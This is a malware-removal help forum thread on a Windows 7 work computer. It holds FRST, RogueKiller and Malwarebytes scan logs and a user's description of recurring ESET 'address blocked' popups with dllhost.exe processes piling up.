2014-11-03 14:47 - 2009-07-13 21:34 - 01048576 _____ () C:\Windows\system32\config\DEFAULT.bak
2014-11-03 14:47 - 2009-07-13 21:34 - 00262144 _____ () C:\Windows\system32\config\SECURITY.bak
2014-11-03 13:51 - 2009-07-13 21:34 - 00262144 _____ () C:\Windows\system32\config\SAM.bak
2014-11-02 07:41 - 2013-10-23 16:10 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-31 09:13 - 2013-10-23 16:10 - 00001149 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-10-23 14:33 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Public\Libraries
2014-10-22 07:36 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-21 09:38 - 2013-03-14 10:40 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2014-10-21 09:11 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-17 11:39 - 2014-08-14 08:05 - 00000000 ____D () C:\Users\bcostello
2014-10-15 10:35 - 2014-09-09 19:05 - 00000000 ____D () C:\FTC
2014-10-15 09:56 - 2013-04-09 14:09 - 00000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-10-06 07:57 - 2009-07-14 00:08 - 00032612 _____ () C:\Windows\Tasks\SCHEDLGU.TXT

Files to move or delete:
====================
C:\Users\kmitchell\CrmClientSetup.exe
C:\Users\kmitchell\msvcp100.dll
C:\Users\kmitchell\msvcr100.dll

Some content of TEMP:
====================
C:\Users\bcostello\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll [2010-11-20 22:24] - [2014-06-03 08:23] - 0524288 ____A (Microsoft Corporation) 6223F47AFA5D9C1ECB5AFD088BD19618

ATTENTION ======> If the system is having audio adware rpcss.dll is patched. Google the MD5, if the MD5 is unique the file is infected.

C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-29 11:59
  9. Thanks for your time and help with this MrCharlie. I also want to mention that I'm running these scans on my administrator account, not the account of the affected user. Will this affect the results?
  10. RogueKiller V10.0.4.0 (x64) [Oct 29 2014] by Adlice Software
      mail : http://www.adlice.com/contact/
      Feedback : http://forum.adlice.com
      Website : http://www.adlice.com/softwares/roguekiller/
      Blog : http://www.adlice.com

      Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
      Started in : Normal mode
      User : bcostello [Administrator]
      Mode : Scan -- Date : 11/04/2014 09:28:46

      ¤¤¤ Processes : 0 ¤¤¤

      ¤¤¤ Registry : 16 ¤¤¤
      [PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
      [PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
      [PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
      [PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
      [PUM.SearchPage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
      [PUM.SearchPage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
      [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
      [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
      [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
      [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
      [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
      [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
      [PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
      [PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
      [PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
      [PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found

      ¤¤¤ Tasks : 0 ¤¤¤

      ¤¤¤ Files : 0 ¤¤¤

      ¤¤¤ Hosts File : 1 ¤¤¤
      [C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost

      ¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

      ¤¤¤ Web browsers : 0 ¤¤¤

      ¤¤¤ MBR Check : ¤¤¤
      +++++ PhysicalDrive0: SAMSUNG SSD PM830 2.5" 7 +++++
      --- User ---
      [MBR] 4ae5c1f7864edd27dcfcf30b3307905a
      [bSP] 2ca67ac4e906422a9807f6f81177dd53 : HP MBR Code
      Partition table:
      0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
      1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 752 MB
      2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1622016 | Size: 121308 MB
      User = LL1 ... OK
      User = LL2 ... OK
  11. Malwarebytes Anti-Malware
      www.malwarebytes.org

      Scan Date: 11/4/2014
      Scan Time: 9:12:58 AM
      Logfile: mbamreport.txt
      Administrator: Yes

      Version: 2.00.3.1025
      Malware Database: v2014.11.04.03
      Rootkit Database: v2014.11.01.02
      License: Free
      Malware Protection: Disabled
      Malicious Website Protection: Disabled
      Self-protection: Disabled

      OS: Windows 7 Service Pack 1
      CPU: x64
      File System: NTFS
      User: bcostello

      Scan Type: Threat Scan
      Result: Completed
      Objects Scanned: 550808
      Time Elapsed: 5 min, 30 sec

      Memory: Enabled
      Startup: Enabled
      Filesystem: Enabled
      Archives: Enabled
      Rootkits: Disabled
      Heuristics: Enabled
      PUP: Enabled
      PUM: Enabled

      Processes: 0 (No malicious items detected)
      Modules: 0 (No malicious items detected)
      Registry Keys: 0 (No malicious items detected)
      Registry Values: 0 (No malicious items detected)
      Registry Data: 2
      PUM.Disabled.SecurityCenter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER|UpdatesDisableNotify, 1, Good: (0), Bad: (1),Replaced,[834078bfe99346f0ba29c470d431f60a]
      PUM.Hijack.ConnectionControl, HKU\S-1-5-21-1619941995-4271792153-444280415-1167-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|ConnectionsTab, 1, Good: (0), Bad: (1),Replaced,[80438fa83349c670e404e0546a9b25db]
      Folders: 0 (No malicious items detected)
      Files: 0 (No malicious items detected)
      Physical Sectors: 0 (No malicious items detected)
      (end)
  12. For a couple of weeks, one of our users has had non-stop ESET popups informing him that "an address has been blocked." As this is happening, many dllhost.exe *32 COM Surrogate processes build up in the task manager. This problem is only present on his user account on the computer. I deleted his user profile and had him log in again. The problem cleared for almost a week before it came back. Any help ridding this computer of it would be greatly appreciated. I've run a FRST scan and attached the logs. FRST.txt Addition.txt